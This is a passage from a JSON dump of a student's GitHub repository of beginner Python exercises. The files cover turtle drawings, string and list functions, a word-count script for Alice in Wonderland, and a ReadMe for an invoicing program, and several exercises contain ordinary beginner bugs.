(0,3) ; (4,+infinity)" }, { "alpha_fraction": 0.5924170613288879, "alphanum_fraction": 0.6303317546844482, "avg_line_length": 13.066666603088379, "blob_id": "6fb0ce7bb589f23356529ac4ab94210bd0bee68a", "content_id": "6a1e907e04b7f581f8870dbbe82fd9a98a7f02a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 25, "num_lines": 15, "path": "/Week 4 python/4.9.9.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\n\nt = turtle.Turtle()\nt.pensize(3)\n\ndef 
draw_triangle(t, sz):\n for _ in range(5):\n t.forward(sz)\n t.right(144)\n\ndraw_triangle(t,100)\n\nwindow.exitonclick()\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.5873016119003296, "avg_line_length": 22.625, "blob_id": "4e4936b496c19679354eae3e24ce484602deb888", "content_id": "fe099b453ef8bf5fb4b39f44ae7fd1aa5660fa7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/Week_6_Python/Exercise_1/5.1.19.9.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def remove_letter(letter, word):\n without_letter = \"\"\n for c in word:\n if c not in word:\n without_letter += c\n return without_letter\n\nremove_letter(\"a\", \"apple\")\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.6686567068099976, "avg_line_length": 15, "blob_id": "4533513a3c4eb11f2100f152757b50822fd9b5ab", "content_id": "011cbfb3996f92c111d1fea96f54d2baa47eed11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 30, "num_lines": 21, "path": "/Week 5 Python/4.9.5.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(2)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n animal.forward(size)\n animal.right(90)\n\nsize = 2\nfor _ in range(90):\n tess.right(1)\n draw_square(tess, size)\n size += 4\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.65625, "avg_line_length": 15.809523582458496, "blob_id": "5980abd94b12b66b05dcce3cc436a52f947743c4", "content_id": "6dcef12526c23b32727245b324b79257b0c5db74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 30, "num_lines": 21, "path": "/Week 5 Python/4.9.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n for _ in range(4):\n animal.forward(size)\n animal.left(90)\n\nsize = 80\nfor _ in range(20):\n tess.right(18)\n draw_square(tess,size)\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.5880149602890015, "alphanum_fraction": 0.6104868650436401, "avg_line_length": 16.866666793823242, "blob_id": "61cff9694bc6aa3d1c8f9d0c1090614d05b8b069", "content_id": "be1ddcc19d6663b7d76e644972fbc9399ad4a456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 42, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "start = 10\nstop = 0\nstep = -2\n\nif start > stop:\n step < 0\n lijst = list(range(start, stop, step))\n print(lijst)\nelse: print(\"not possible\")\n\nif stop > start:\n step > 0\n lijst = list(range(start, stop, step))\n print(lijst)\nelse: print(\"not possible\")" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6384615302085876, "avg_line_length": 15.3125, "blob_id": "9fb4624711f3ce1334b44e58af4850c0386ed881", "content_id": 
"7607d5722feaebb22a4219ed5c3dbe06c11e8b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 32, "num_lines": 16, "path": "/Week 5 Python/4.9.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.pensize(3)\nt.color(\"blue\")\n\ndef draw_equitriangle(t, n, sz):\n for _ in range(n):\n sz += 4\n t.speed(0)\ndraw_equitriangle(t, 80, 3)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.8044642806053162, "alphanum_fraction": 0.8053571581840515, "avg_line_length": 85.07691955566406, "blob_id": "d33e762dc79056dff682ec7908fd4f20980444c0", "content_id": "92a4d3077312416f89fbed6b9851c8948f70a923", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 121, "num_lines": 26, "path": "/Python_final_assessment/ReadMe.txt", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "The program we created allows companies to create an invoice for their customers. It makes this process really easy\nand is very straightforward in its application.\n\nThe program is currently focused on a grocery store, but its use can easily be extended to any kind of business.\nThe remainder of this text provides information on how the program should be used.\n\nThe first thing a company needs to consider before making use of the program is entering the different goods that they\nsell and the according prices into a csv file. Our program is not limited to any number of goods so this does not\nrestrict large businesses from adopting our program. Once the products and prices are inserted, one can press “1”\nto start with the invoice-creating process.\n\nThe first step after launching the process is to check whether we are creating an invoice for an existing or for a\nnew client. We filter this by looking at the name of the client. The existing client database is automatically opened\nin order to take a look whether we face an existing client or not. In this phase, we assume for simplicity that there are\nno clients with identical names. In the case of an existing client, the employee should insert the name as it is known\nin our database and in that case the program retrieves the corresponding data on ZIP code and address from our database.\nIf we are dealing with a new client, we ask this data regarding his address and save it for a possible next invoice.\n\nThe next step is to take the order of the client. The products are easily distinguished from each other after adding\nproduct numbers for each different product. When arriving at this step, this product list is opened so that the employer\ncan look for which product numbers belong to this invoice. First, the employer inserts how many different orders should\nbe displayed on the invoice, and second he enters the quantities of each different product.\n\nAfter filling in the final product quantity, we show a preview of the invoice to the employee. It is important to take\na close look at this invoice to correct whether everything on the invoice is right. 
When the employee approves the\ninvoice, he presses \"1\", and from that moment the invoice is saved into the database.\n\n\n" }, { "alpha_fraction": 0.5694444179534912, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 19.428571701049805, "blob_id": "f40b58d68513dcbf34c33c4ce84fdbabbd54c4b2", "content_id": "236b99c123d30da4f38a4c24e9918e8b2341ed85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Week 5 Python/4.9.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def sum_to(n):\n result = (n * (n+1) /2)\n return result\n\nanswer = int(input(\"What number?\"))\nt = sum_to(answer)\nprint(\"The answer is\", t)\n\n" }, { "alpha_fraction": 0.6233062148094177, "alphanum_fraction": 0.6260162591934204, "avg_line_length": 22.0625, "blob_id": "31639f6244829d8883eaedd0da853c8ce500d70d", "content_id": "5b7eea61ed8e192fcbc1b6066735a4d49cdeed11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/Week 5 Python/4.9.8.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "start = input(\"Do you want to calculate the radius of a circle?\")\n\nif start == yes:\n import math\n\n def area_of_circle(r):\n result = (r ** 2 * math.pi)\n return result\n\n\n answer = int(input(\"What is the radius of your circle?\"))\n calculation = area_of_circle(answer)\n print(\"The area is\", calculation)\n\nelse:\n print(\"Fijne dag verder dan)\n" }, { "alpha_fraction": 0.6132075190544128, "alphanum_fraction": 0.6415094137191772, "avg_line_length": 15.789473533630371, "blob_id": "4a33f58676248de868bebf459dfec4d1fa27444a", "content_id": "ad35f86f9f2877157ce3fae244d3a71f21340962", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 32, "num_lines": 19, "path": "/Week 5 Python/Great drawing.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\n\ntess = turtle.Turtle()\ntess.pensize(1)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n for _ in range(4):\n tess.forward(size)\n tess.right(90)\n\nfor index in range(90):\n draw_square(tess, index * 5)\n tess.left(6)\n tess.speed(7)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.731249988079071, "avg_line_length": 31.200000762939453, "blob_id": "992a965c657af86b07c2391b861c6738a6f19a24", "content_id": "0cfa0d51b106399645f6ce7f1ae9886e2fc825ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/Week_6_Python/Exercise 3/5.3.23.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "\"\"\"\nTest 1 is false, in this case this and that are two different objects that have the same value.\nTest 2 is true, this and that refer to the same object.\n\n\"\"\"" }, { "alpha_fraction": 0.5580110549926758, "alphanum_fraction": 0.6022099256515503, "avg_line_length": 13.520000457763672, "blob_id": "243e012a113a1cb819054cbdc9b5f9011a87a90a", "content_id": "85c1d6a338dd1c14b53ccc911785c304bd613042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 28, "num_lines": 25, "path": "/Week 5 Python/4.9.10.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.color(\"pink\")\nt.pensize(3)\n\ndef draw_triangle(t, sz):\n for _ in range(5):\n t.forward(sz)\n t.right(144)\n\nfor _ in range(5):\n draw_triangle(t, 100)\n t.penup()\n t.forward(350)\n t.right(144)\n t.pendown()\n t.speed(0)\n\n\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.5229681730270386, "alphanum_fraction": 0.547703206539154, "avg_line_length": 16.625, "blob_id": "fd28a28843d4fa3c5dc9f1c3dc9389428436cdfd", "content_id": "10d160eeccd11d0a60b02b4035bb24e0ea20f484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/Week 4 python/exercise 3.4.4.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "dag = int(input(\"Which day is it today\"))\n\nif dag == 0:\n print(\"Sunday\")\nif dag == 1:\n print(\"Monday\")\nif dag == 2:\n print(\"Tuesday\")\nif dag == 3:\n print(\"Wednesday\")\nif dag == 4:\n print(\"Thursday\")\nif dag == 5:\n print(\"Friday\")\nif dag == 6:\n print(\"Saturday\")\n\n" }, { "alpha_fraction": 0.6299694180488586, "alphanum_fraction": 0.6544342637062073, "avg_line_length": 13.909090995788574, "blob_id": "6afc82dabdd7c6b058ad0df0018be7051165ce72", "content_id": "a4c2f5d546f0d3d2726d92214aa6d5411cc64d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 30, "num_lines": 22, "path": "/Week 5 Python/4.9.5.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n animal.forward(size)\n animal.right(90)\n\n\nsize = 2\nfor _ in range(80):\n draw_square(tess, size)\n size += 4\n tess.speed(0)\n\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.6795580387115479, "alphanum_fraction": 0.6850828528404236, "avg_line_length": 29.33333396911621, "blob_id": "4d6d8145e2113fd7220fcd50d89fc658f2ce9ccd", "content_id": "cdcaa544b53b2fe55372f723c67301c3bcc95fbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 52, "num_lines": 6, "path": "/Week_6_Python/Exercise_1/5.1.19.8.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def mirror(input):\n mirror_string = input + input[::-1]\n return mirror_string\n\ntext = input(\"What is the word you want to mirror?\")\nprint(\"The word mirrored is\", mirror(text))" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.680232584476471, "avg_line_length": 27.66666603088379, "blob_id": "bdf3f8f83647303ea3e9feb1f41f28f1ae06c277", "content_id": "5dcb9127b46f4c0c56f3743f361d51a73b863600", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 172, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/Week_6_Python/Exercise_1/5.1.19.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def reverse(input):\n rev_string = 
input[::-1]\n return rev_string\n\ntext = input(\"What is the word you want to reverse?\")\nprint(\"The word backwards is\", reverse(text))\n" }, { "alpha_fraction": 0.5968379378318787, "alphanum_fraction": 0.6205533742904663, "avg_line_length": 13.05555534362793, "blob_id": "e0450c958dd7e19bdd0e62f7664644acf8a3f6f8", "content_id": "4f6557693b435778fc1b02e3b829c07171419645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "no_license", "max_line_length": 28, "num_lines": 18, "path": "/Week 5 Python/4.9.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\nt = turtle.Turtle()\nt.pensize(3)\nt.color(\"pink\")\n\ndef draw_poly(t, n, sz):\n for _ in range(n):\n t.forward(sz)\n t.left(45)\n\ndraw_poly(t, 8, 50)\n\n\nwindow.exitonclick()\n" }, { "alpha_fraction": 0.6177285313606262, "alphanum_fraction": 0.6426593065261841, "avg_line_length": 17.100000381469727, "blob_id": "3aae02df1b41de2fb4567b90ebd3a1a5aaf855b8", "content_id": "342fc6a59f57d761554d47077b77f3b1f82a691a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 361, "license_type": "no_license", "max_line_length": 30, "num_lines": 20, "path": "/Week 5 Python/4.9.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\ndef draw_square(animal, size):\n for _ in range(4):\n animal.color('pink')\n animal.forward(size)\n animal.left(90)\n animal.forward(size * 2)\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\n\nfor _ in range(5):\n draw_square(ferdi, 20)\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.7770270109176636, "alphanum_fraction": 0.7770270109176636, "avg_line_length": 73.5, "blob_id": "9d13cd468b27f5453f0278ba721de5dddf0469a0", "content_id": "065f57968c4123851a77b9a39de3dc8f439ee535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 104, "num_lines": 2, "path": "/Week_6_Python/Exercise 2/5.2.6.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "\"\"\"A pair is a kind of tuple. 
A tuple can consist of a pair of characteristics but also consist of three\nor even more characteristics/data values\"\"\"" }, { "alpha_fraction": 0.6203866600990295, "alphanum_fraction": 0.6300527453422546, "avg_line_length": 28.736841201782227, "blob_id": "32bb12a40d7121513b7a95938c24875302db6fc2", "content_id": "225844e00e84d7c94c501dd9488a1abeb91048a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1138, "license_type": "no_license", "max_line_length": 96, "num_lines": 38, "path": "/Week_6_Python/Exercise_4/alice_in_wonderland.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "#retrieve the book\nimport urllib.request\n\nurl = \"https://www.gutenberg.org/files/11/11-0.txt\"\nfile_name = \"alice.txt\"\nurllib.request.urlretrieve(url, file_name)\n\n\n#read the book\n\nwith open(file_name) as alice_book:\n alice_text = alice_book.read()\n\n#process the book\nwords = alice_text.lower().split()\nword_count = {}\n\nfor word in words:\n word = word.strip(\"!\\\"#$%&\\'()*+,./:;<=>?@[\\\\]^_`{|}~\")\n #Note that I removed the - sign since it is a single word in this case\n if len(word) > 0 and word[0].isalpha(): #isalpha means whether it is in the alphabet\n word_count[word] = word_count.get(word, 0) + 1\n\n#get the longest word\nlongest_word = \"\"\nfor word in word_count:\n if len(word) > len(longest_word):\n longest_word = word\n\n#print to output file\nwith open(\"alice_words.txt\", \"w\") as alice_output:\n string_format = \"{:<\" +str(len(longest_word)) + \"} {:<5}\\n\"\n\n alice_output.write(string_format.format(\"Word\", \"Count\"))\n alice_output.write(\"=\" * (len(longest_word) + 6) + \"\\n\")\n\n for word in sorted(word_count):\n alice_output.write(string_format.format(word, word_count[word]))\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6727549433708191, "alphanum_fraction": 0.6803653240203857, "avg_line_length": 29.952381134033203, "blob_id": "87183a68a1f798f2c609049aceb0fdeffdccf240", "content_id": "eb23966ab4912b82876f707d9c06938218be65eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 118, "num_lines": 21, "path": "/Week_6_Python/Exercise_1/5.1.19.5.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "poem = \"\"\"Reinder Evert is a very good looking guy who is really attractive and also very smart. 
He is rarely seen \noutside the house and therefore he has a lack of vitamin D\"\"\"\n\nlossewoorden = poem.split(\" \")\n\ndef count_words(text):\n return len(lossewoorden)\n\ndef count_words_containing(text, letter):\n count = 0\n for word in lossewoorden:\n if letter in word:\n count += 1\n return count\n\nletter = \"e\"\ncount = count_words(poem)\necount = count_words_containing(poem, letter)\nepercentage = (ecount/count) *100\n\nprint(\"Your text containt {} words, of which {} contain an e, which is about {} %\".format(count, ecount, epercentage))\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.5874999761581421, "avg_line_length": 20.133333206176758, "blob_id": "eaaa9b2fc7f53337b7043b72159c2d4afb2c53f2", "content_id": "7726e34bdb6ee43eaf14718c52ad3c59d83cb299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 40, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.7.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def dot_product(vector1, vector2):\n if len(vector1) != len(vector2):\n return None\n\n vector3 = []\n for v1, v2 in zip(vector1, vector2):\n vector3.append(v1 * v2)\n\n sumvector = 0\n for vector_3 in vector3:\n sumvector += vector_3\n\n return sumvector\n\nprint(dot_product([2,2], [2,3]))\n\n\n\n" }, { "alpha_fraction": 0.5685279369354248, "alphanum_fraction": 0.6345177888870239, "avg_line_length": 32, "blob_id": "de24cd9384c173bd94fcc79f6f678c4cfab6b9c3", "content_id": "79e62d42da517ac9742f86dea4214a604c7ce20a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 78, "num_lines": 6, "path": "/Week_6_Python/Exercise 2/5.2.6.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "numbers_to_ten = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\nprint(numbers_to_ten[4])\n\nif numbers_to_ten == 7:\n print(\"gelukt\")\n\"\"\"Seems like it is not possible to use tuples as an argument in a function\"\"\"" }, { "alpha_fraction": 0.6268041133880615, "alphanum_fraction": 0.6412371397018433, "avg_line_length": 17.653846740722656, "blob_id": "277ba4b670cbe2b83adfc3ab21f3c112f82ddce1", "content_id": "3664c108b3b7e5b99112f84bf530cc4b60ea99cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 45, "num_lines": 26, "path": "/Week 4 python/Week 4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\ndef draw_square(animal, size):\n \"\"\"\n Draw a square\n \"\"\"\n for _ in range(4):\n animal.forward(size)\n animal.left(90)\n\n# non-fruitful function\ndef calculate_surface_of_square(side_length):\n surface = side_length ** 2\n print(surface)\n return surface\n\nscreen = turtle.Screen()\nnick = turtle.Turtle()\n\nfor index in range(6):\n draw_square(nick, index * 5)\n nick.left(6)\n\n result = calculate_surface_of_square()\n\nscreen.exitonclick()\n" } ]
32
DishantNaik/GitTutProj
https://github.com/DishantNaik/GitTutProj
047cf2b8032b72ff7055cb8bd029a05342843255
ea35bad388a31d2585f8805f2c5123f3d97a8382
0c26dc9209ab0787586ce6d852d6240a058703a4
refs/heads/master
2022-07-10T17:10:22.771180
2020-05-08T22:22:36
2020-05-08T22:22:36
262,438,700
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7529411911964417, "alphanum_fraction": 0.7529411911964417, "avg_line_length": 27.33333396911621, "blob_id": "492e49f81fcf59f283120dbdd646789b0e5cdb6b", "content_id": "594350ea307ca4501c45aafb89a5f52df28f982c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 33, "num_lines": 3, "path": "/sample1.py", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "print(\"Learning git\")\nprint(\"Just another sample file\")\nprint(\"Version in mybranch\")\n" }, { "alpha_fraction": 0.8142856955528259, "alphanum_fraction": 0.8142856955528259, "avg_line_length": 34, "blob_id": "462b9ba96b164164968a82cd7e1576b9e3559b19", "content_id": "e9bc0a59e1553e8f72dbbb743f386f03a0af830f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 70, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/README.md", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "# GitTutProj\nThis repo is created for git and GitHub learning purpose\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 22.33333396911621, "blob_id": "e1399c34f42043a1f0af3b53f2a026c6df891ff6", "content_id": "7dded1224994232a347a1273608bdfc00f194515", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 28, "num_lines": 3, "path": "/sample.py", "repo_name": "DishantNaik/GitTutProj", "src_encoding": "UTF-8", "text": "print(\"sample git proj\")\nprint(\"line 2\")\nprint(\"Version in mybranch\")\n" } ]
3
benja971/SpaceWar
https://github.com/benja971/SpaceWar
3e61cf1d7906cfbae6de4c3bf0dec68863109bb8
710589df21c1254e24a65517d08fb38857c178b1
7a89f03854c13d96c266f0dcdfa27e95d1e0fbef
refs/heads/master
2021-05-21T01:50:57.819964
2020-04-02T22:23:53
2020-04-02T22:23:53
252,493,416
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6435871720314026, "alphanum_fraction": 0.6682021021842957, "avg_line_length": 26.247058868408203, "blob_id": "62746397e7f7af58cfda4f54bfb1e51f0bcb3fb1", "content_id": "e4673f485aeaab4bdb6a891d0aebba71531f76b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6947, "license_type": "no_license", "max_line_length": 82, "num_lines": 255, "path": "/Vaisseau.py", "repo_name": "benja971/SpaceWar", "src_encoding": "UTF-8", "text": "import pygame, json, os\nfrom random import randint, random\nfrom ctypes import windll\nwindll.shcore.SetProcessDpiAwareness(1)\n\npygame.init()\n\nlargeur, hauteur = 1920, 1080\nfenetre = pygame.display.set_mode((largeur,hauteur), flags = pygame.FULLSCREEN)\n\n\ndef getImgBank(path: str) -> dict:\n\t\"\"\"Return a dict containing all images in a folder with recursion.\"\"\"\n\td = {}\n\tfor f in os.listdir(path):\n\t\tif len(f) > 4 and f[-4:] in ('.png', '.jpg'):\n\t\t\td[f[:-4]] = pygame.image.load(f'{path}/{f}').convert_alpha()\n\t\telse:\n\t\t\td[f] = getImgBank(f'{path}/{f}')\n\treturn d\n\nbank = getImgBank(\"images\")\n\nclass ElementGraphique():\n\t# Le constructeur basique\n\tdef __init__(self, img, x, y):\n\t\tself.image = img\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = x \n\t\tself.rect.y = y \n\n\tdef Afficher(self, window) :\n\t\twindow.blit(self.image, self.rect)\n\n\nclass Perso(ElementGraphique):\n\tdef __init__(self, img, x, y):\n\t\tsuper(Perso, self).__init__(img, x, y)\n\t\tself.vie = 1\n\t\tself.vitesse = 10\n\t\tself.angle = 0\n\t\tself.anglemax = 0\n\n\tdef Deplacer(self, touches, largeur, hauteur):\n\t\tif touches[pygame.K_d] and self.rect.x <= largeur-self.rect.w:\n\t\t\tself.rect.x += self.vitesse\n\t\tif touches[pygame.K_a] and self.rect.x >= 0:\n\t\t\tself.rect.x -= self.vitesse\n\t\tif touches[pygame.K_w] and self.rect.y >= 0:\n\t\t\tself.rect.y -= self.vitesse\n\t\tif touches[pygame.K_s] and self.rect.y <= hauteur-self.rect.h:\n\t\t\tself.rect.y += self.vitesse\n\n\tdef Orientation(self,N,S,E,W,NE,NW,SE,SW):\n\t\tprint(self.anglemax, self.angle, end = '\\r')\t\n\n\t\tif N:\n\t\t\tif 46<=self.angle<=180:\n\t\t\t\tself.anglemax = 0\n\n\t\t\telif 180<self.angle<=316:\n\t\t\t\tself.anglemax = 360\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif S:\n\t\t\tself.anglemax = 180\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif E:\n\t\t\tif self.angle == 360:\n\t\t\t\tself.angle = 0\n\n\t\t\tself.anglemax = 90\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > 
self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif W:\n\t\t\tif self.angle == 0:\n\t\t\t\tself.angle = 360\n\t\t\t\t\n\t\t\tself.anglemax = 270\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif NW:\n\t\t\tif self.angle == 0:\n\t\t\t\tself.angle = 360\n\t\t\tself.anglemax = 316\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif NE:\n\t\t\tself.anglemax = 46\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > 